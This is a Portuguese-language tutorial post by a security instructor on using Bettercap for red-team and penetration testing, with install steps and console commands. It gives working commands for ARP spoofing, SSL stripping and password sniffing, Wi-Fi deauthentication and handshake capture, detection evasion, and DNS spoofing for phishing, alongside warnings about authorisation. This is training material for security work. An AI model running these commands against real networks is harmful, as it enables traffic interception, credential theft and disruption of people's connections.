Bettercap: Ferramenta Essencial para Red Team e Testes de Penetração

Criado por André Miranda Albuquerque em Cyber Security 7/07/2025

🔥 Bettercap: Ferramenta Essencial para Red Team e PenTest

Uma das ferramentas mais versáteis para ataques de rede, identificação de hosts ativos em uma rede e que pode ser usada em um PenTest.

🎯 Por que o Bettercap é Fundamental para Red Teamers?

Em um cenário onde a segurança de rede é crucial, o Bettercap se destaca como uma ferramenta essencial para profissionais de segurança ofensiva. Desenvolvido em Go, combina performance eficiente com interface intuitiva, oferecendo recursos avançados para testes de penetração.

🚀 Principais Características do Bettercap

Performance Otimizada: Escrito em Go, oferece velocidade nativa e baixo consumo de recursos
Arquitetura Modular: Sistema de plugins extensível que se adapta às necessidades específicas
Cross-Platform: Compatível com Linux, macOS e Windows
Tempo Real: Interceptação e modificação de tráfego em tempo real
Automação: Scripts e workflows para operações Red Team complexas

🛠️ Funcionalidades Principais

🎭 Man-in-the-Middle (MITM) Attacks

ARP Spoofing: Redirecionamento de tráfego de rede
DNS Spoofing: Controle de resolução de nomes
HTTP/HTTPS Interception: Captura e modificação de requisições web
SSL Strip: Downgrade de conexões para captura de credenciais

🔍 Network Reconnaissance

Host Discovery: Mapeamento de dispositivos ativos na rede
Service Enumeration: Identificação de serviços e versões
Wireless Monitoring: Análise de redes Wi-Fi e dispositivos BLE
Packet Sniffing: Captura detalhada de tráfego de rede

🎯 Credential Harvesting

Password Sniffing: Captura de credenciais em texto claro
Cookie Hijacking: Sequestro de sessões web
Handshake Capture: Coleta de handshakes WPA/WPA2
Keylogger Integration: Captura de keystrokes remotos

Como podemos verificar ele pode fazer muitas coisas. Contudo vamos para uma guia prático.

💻 Guia Prático: Usando o Bettercap

🔧 Instalação


# Kali Linux

sudo apt update && sudo apt install bettercap
# Instalação via Go

go install github.com/bettercap/bettercap@latest

🎮 Comandos Básicos


# Inicie o Bettercap

sudo bettercap



# Especifique interface

sudo bettercap -iface eth0

🕵️ Reconnaissance de Rede

Descoberta de Hosts


# Ative o módulo de descoberta

» net.probe on



# Visualize hosts descobertos

» net.show

💻 Vamos ver na Prática

Filtragem e Targeting


# Configure descoberta avançada

» set net.probe.mdns true

» set net.probe.nbns true



# Monitore host específico

» set net.sniff.filter "host 192.168.1.100"

🎯 Operações MITM

ARP Spoofing


# Target específico

» set arp.spoof.fullduplex true

» set arp.spoof.targets 192.168.1.100

» arp.spoof on



# Interceptação de gateway

» set arp.spoof.targets 192.168.1.1

» arp.spoof on

HTTP/HTTPS Interception


# Proxy HTTP transparente

» set http.proxy.sslstrip true

» set http.proxy.script /path/to/script.js

» http.proxy on



# Captura de credenciais

» net.sniff on

» set net.sniff.verbose true

🔒 Ataques Wi-Fi


# Modo monitor

» wifi.recon on



# Deauth attack

» wifi.deauth BSSID

» wifi.deauth ff:ff:ff:ff:ff:ff



# Handshake capture

» set wifi.handshakes.file /tmp/handshakes.pcap

» wifi.recon on

🧠 Técnicas Avançadas para Red Team

🎭 Evasão e Stealth


# Randomize MAC address

» set net.interface.mac random



# Throttle para evitar detecção

» set arp.spoof.throttle 1s

» set net.probe.throttle 2s

🔄 Automação e Scripting


# Carregue caplets (scripts)

» caplets.show

» caplets.load /path/to/script.cap



# Execute comandos em lote

» include /path/to/commands.txt

📊 Logging e Evidências


# Enable logging

» set events.stream.output /tmp/bettercap.log

» events.stream on



# Capture packets

» set net.sniff.output /tmp/capture.pcap

» net.sniff on

🎯 Cenários Práticos de Uso

🏢 Avaliação de Rede Corporativa


# Descoberta controlada

» set net.probe.throttle 5s

» net.probe on



# Mapeamento de serviços críticos

» syn.scan 192.168.1.0/24 22,80,443,3389

🌐 Teste de Penetração Wireless


# Reconnaissance completo

» wifi.recon on

» wifi.show



# Captura de handshake direcionada

» set wifi.handshakes.file /tmp/wpa_handshakes.pcap

» wifi.deauth [TARGET_BSSID]

🎭 Suporte para Social Engineering


# DNS spoofing para phishing

» set dns.spoof.domains evil-corp.com

» set dns.spoof.address 192.168.1.50

» dns.spoof on

⚖️ Considerações Éticas e Legais

🔒 Uso Responsável

✅ SEMPRE obtenha autorização explícita por escrito
✅ Defina escopo claro e limitado
✅ Documente todas as atividades
✅ Proteja dados capturados
✅ Relatórios detalhados para remediation

🚨 Avisos Legais

⚠️ Uso não autorizado é CRIME
⚠️ Respeite privacidade e dados pessoais
⚠️ Conheça leis locais sobre cybersecurity
⚠️ Mantenha ética profissional sempre

🚀 Próximos Passos

📚 Recursos para Aprofundamento

Bettercap Documentation: Documentação oficial completa
Caplets Repository: Scripts da comunidade
Red Team Playbooks: Táticas e procedimentos avançados

🔧 Ferramentas Complementares

Cobalt Strike: Framework C2 profissional
BloodHound: Active Directory enumeration
Empire: PowerShell post-exploitation

🎯 Conclusão

O Bettercap é uma ferramenta versátil e poderosa para profissionais de segurança ofensiva. Sua arquitetura moderna, performance eficiente e flexibilidade o tornam uma escolha sólida para operações Red Team e testes de penetração.

Lembre-se: Use essas técnicas apenas em ambientes autorizados e sempre com o objetivo de melhorar a segurança, nunca para causar danos.

💪 Continue Aprendendo

Se este conteúdo foi útil para sua jornada em cybersecurity, compartilhe com outros profissionais e conecte-se comigo para mais conteúdos sobre Red Team e Penetration Testing.

🔥 Que a força esteja com você!

#RedTeam #PenetrationTesting #CyberSecurity #Bettercap #EthicalHacking #InfoSec #NetworkSecurity #OSCP #CyberDefense

André Miranda Albuquerque

Instructor role

Postagens do Autor

Categorias

Linux Cyber Security

Postagens recentes